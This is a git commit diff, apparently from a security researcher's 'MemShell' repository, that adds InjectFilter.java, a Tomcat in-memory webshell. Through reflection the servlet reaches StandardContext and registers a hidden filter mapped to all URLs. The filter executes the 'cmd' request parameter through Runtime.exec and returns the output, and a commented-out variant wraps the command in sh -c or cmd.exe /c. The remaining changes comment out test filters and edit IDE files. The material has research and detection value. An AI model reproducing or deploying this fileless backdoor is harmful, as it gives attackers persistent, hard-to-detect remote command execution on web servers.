InjectFilter.java

SummerSec · SummerSec · commit 9cc39544ca6d · 2021-07-20T17:04:01.000+08:00
diff --git a/MemShell/MemShell.iml b/MemShell/MemShell.iml
@@ -40,5 +40,6 @@
         <jarDirectory url="file://D:/Tomcat9/lib" recursive="false" />
       </library>
     </orderEntry>
+    <orderEntry type="library" name="lib" level="project" />
   </component>
 </module>
diff --git a/MemShell/src/memshell/tomcat/InjectFilter.java b/MemShell/src/memshell/tomcat/InjectFilter.java
@@ -0,0 +1,165 @@
+package memshell.tomcat;
+
+
+import org.apache.catalina.Context;
+import org.apache.catalina.core.ApplicationContext;
+import org.apache.catalina.core.ApplicationFilterConfig;
+import org.apache.catalina.core.StandardContext;
+import org.apache.tomcat.util.descriptor.web.FilterDef;
+import org.apache.tomcat.util.descriptor.web.FilterMap;
+
+import javax.servlet.*;
+import javax.servlet.annotation.WebFilter;
+import javax.servlet.annotation.WebServlet;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import java.io.InputStream;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.util.Map;
+import java.util.Scanner;
+
+/**
+ * @ClassName: InjectFilter
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/7/19 16:26
+ * @Version: v1.0.0
+ * @Description:
+ **/
+//@WebFilter(filterName = "injectFilter", urlPatterns = "/*")
+@WebServlet("/injectFilter")
+public class InjectFilter extends HttpServlet  {
+//public class InjectFilter extends HttpServlet implements Filter {
+
+    @Override
+    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+
+        Field Configs = null;
+        Map filterConfigs;
+        try {
+            //这里是反射获取ApplicationContext的context，也就是standardContext
+            ServletContext servletContext = request.getSession().getServletContext();
+            Field appctx = servletContext.getClass().getDeclaredField("context");
+            appctx.setAccessible(true);
+            // 获取ApplicationContext对象
+            ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
+            Field stdctx = applicationContext.getClass().getDeclaredField("context");
+            stdctx.setAccessible(true);
+            // 获取StandardContext对象
+            StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
+            // filter 名字
+            String FilterName = "InjectFilter";
+            // 获取StandardContext类中的字段filterConfigs
+            Configs = standardContext.getClass().getDeclaredField("filterConfigs");
+            Configs.setAccessible(true);
+
+            filterConfigs = (Map) Configs.get(standardContext);
+            // 判断filterConfigs map中是否含有恶意filter，如果没有注册，如果有则跳过
+            if (filterConfigs.get(FilterName) == null){
+                Filter filter = new Filter() {
+
+                    @Override
+                    public void init(FilterConfig filterConfig) throws ServletException {
+
+                    }
+                    @Override
+                    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+                        HttpServletRequest req = (HttpServletRequest) servletRequest;
+                        if (req.getParameter("cmd") != null){
+                            String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+                            InputStream in = Runtime.getRuntime().exec(req.getParameter("cmd")).getInputStream();
+                            Scanner s = new Scanner(in,charsetName).useDelimiter("\\A");
+                            String output = s.hasNext() ? s.next() : "";
+                            servletResponse.getWriter().write(output);
+
+                            return;
+                        }
+                        filterChain.doFilter(servletRequest,servletResponse);
+                    }
+
+                    @Override
+                    public void destroy() {
+
+                    }
+                };
+                //反射获取FilterDef，设置filter名等参数后，调用addFilterDef将FilterDef添加
+                Class<?> FilterDef = Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef");
+                Constructor declaredConstructors = FilterDef.getDeclaredConstructor();
+                org.apache.tomcat.util.descriptor.web.FilterDef o = (FilterDef)declaredConstructors.newInstance();
+                o.setFilter(filter);
+                o.setFilterName(FilterName);
+                o.setFilterClass(filter.getClass().getName());
+                standardContext.addFilterDef(o);
+                //反射获取FilterMap并且设置拦截路径，并调用addFilterMapBefore将FilterMap添加进去
+                Class<?> FilterMap = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
+                Constructor<?> declaredConstructor = FilterMap.getDeclaredConstructor();
+                org.apache.tomcat.util.descriptor.web.FilterMap o1 = (org.apache.tomcat.util.descriptor.web.FilterMap)declaredConstructor.newInstance();
+
+                o1.addURLPattern("/*");
+                o1.setFilterName(FilterName);
+                o1.setDispatcher(DispatcherType.REQUEST.name());
+                standardContext.addFilterMapBefore(o1);
+
+                //反射获取ApplicationFilterConfig，构造方法将 FilterDef传入后获取filterConfig后，将设置好的filterConfig添加进去
+                Class<?> ApplicationFilterConfig = Class.forName("org.apache.catalina.core.ApplicationFilterConfig");
+                Constructor<?> declaredConstructor1 = ApplicationFilterConfig.getDeclaredConstructor(Context.class,FilterDef.class);
+                declaredConstructor1.setAccessible(true);
+                org.apache.catalina.core.ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) declaredConstructor1.newInstance(standardContext,o);
+                filterConfigs.put(FilterName,filterConfig);
+                response.getWriter().write("suc of Drops");
+                System.out.println("suc of Drops");
+
+
+
+            }
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+
+
+    }
+
+    @Override
+    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+        this.doPost(request, response);
+    }
+
+    @Override
+    public void destroy() {
+
+    }
+
+
+//    @Override
+//    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
+//        HttpServletRequest req = (HttpServletRequest) request;
+//        HttpServletResponse resp = (HttpServletResponse) response;
+//        if (req.getParameter("cmd") != null) {
+//            boolean isLinux = true;
+//            String osTyp = System.getProperty("os.name");
+//            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
+//                isLinux = false;
+//            }
+//            String[] cmds = isLinux ? new String[]{"sh", "-c", req.getParameter("cmd")} : new String[]{"cmd.exe", "/c", req.getParameter("cmd")};
+//            String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+//            InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+//            Scanner s = new Scanner(in,charsetName).useDelimiter("\\A");
+//            String output = s.hasNext() ? s.next() : "";
+//            resp.getWriter().write(output);
+//            resp.getWriter().flush();
+//        }
+//        chain.doFilter(request, response);
+//    }
+//
+
+
+
+//    @Override
+//    public void init(FilterConfig filterConfig) throws ServletException {
+//
+//    }
+
+}
diff --git a/MemShell/src/memshell/tomcat/TestFilter.java b/MemShell/src/memshell/tomcat/TestFilter.java
@@ -16,6 +16,7 @@ public class TestFilter implements Filter {
     @Override
     public void init(FilterConfig filterConfig) throws ServletException {
         System.out.println("Filter init is ok!");
+
     }
 
     @Override
diff --git a/MemShell/src/memshell/tomcat/TestServlet.java b/MemShell/src/memshell/tomcat/TestServlet.java
@@ -16,7 +16,7 @@
 import java.io.IOException;
 
 
-@WebServlet("/TestServlet")
+//@WebServlet("/TestServlet")
 public class TestServlet extends HttpServlet {
 
     @Override
diff --git a/MemShell/src/memshell/tomcat/cmd_Filters.java b/MemShell/src/memshell/tomcat/cmd_Filters.java
@@ -18,7 +18,7 @@
  * @Description:
  **/
 
-@WebFilter("/*")
+//@WebFilter("/*")
 public class cmd_Filters implements Filter {
     @Override
     public void destroy() {
diff --git a/MemShell/src/memshell/tomcat/demoServlet.java b/MemShell/src/memshell/tomcat/demoServlet.java
@@ -28,16 +28,11 @@
 import java.util.Map;
 import java.util.Scanner;
 
-@WebServlet("/demoServlet")
+//@WebServlet("/demoServlet")
 public class demoServlet extends HttpServlet {
     @Override
     protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
 
-
-//        org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
-//        org.apache.catalina.webresources.StandardRoot standardroot = (org.apache.catalina.webresources.StandardRoot) webappClassLoaderBase.getResources();
-//        org.apache.catalina.core.StandardContext standardContext = (StandardContext) standardroot.getContext();
-//        该获取StandardContext测试报错
         Field Configs = null;
         Map filterConfigs;
         try {
@@ -128,4 +123,5 @@ public void destroy() {
     protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
         this.doPost(request, response);
     }
+
 }
diff --git a/MemShell/web/WEB-INF/web.xml b/MemShell/web/WEB-INF/web.xml
@@ -4,15 +4,15 @@
          xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
          version="4.0">
 
-        <filter>
-            <filter-name>TestFilter</filter-name>
-            <filter-class>memshell.tomcat.TestFilter</filter-class>
-        </filter>
-    
-        <filter-mapping>
-            <filter-name>TestFilter</filter-name>
-            <url-pattern>/*</url-pattern>
-        </filter-mapping>
+<!--        <filter>-->
+<!--            <filter-name>TestFilter</filter-name>-->
+<!--            <filter-class>memshell.tomcat.TestFilter</filter-class>-->
+<!--        </filter>-->
+<!--    -->
+<!--        <filter-mapping>-->
+<!--            <filter-name>TestFilter</filter-name>-->
+<!--            <url-pattern>/*</url-pattern>-->
+<!--        </filter-mapping>-->
 
     
     
diff --git a/Rce_Echo/TomcatEcho/.idea/misc.xml b/Rce_Echo/TomcatEcho/.idea/misc.xml
diff --git a/vuldemo/.idea/misc.xml b/vuldemo/.idea/misc.xml
diff --git a/vuldemo/.idea/workspace.xml b/vuldemo/.idea/workspace.xml

Original file line number	Diff line number	Diff line change
`@@ -16,6 +16,7 @@ public class TestFilter implements Filter {`
`16`	`16`	`@Override`
`17`	`17`	`public void init(FilterConfig filterConfig) throws ServletException {`
`18`	`18`	`System.out.println("Filter init is ok!");`
	`19`	`+`
`19`	`20`	`}`
`20`	`21`
`21`	`22`	`@Override`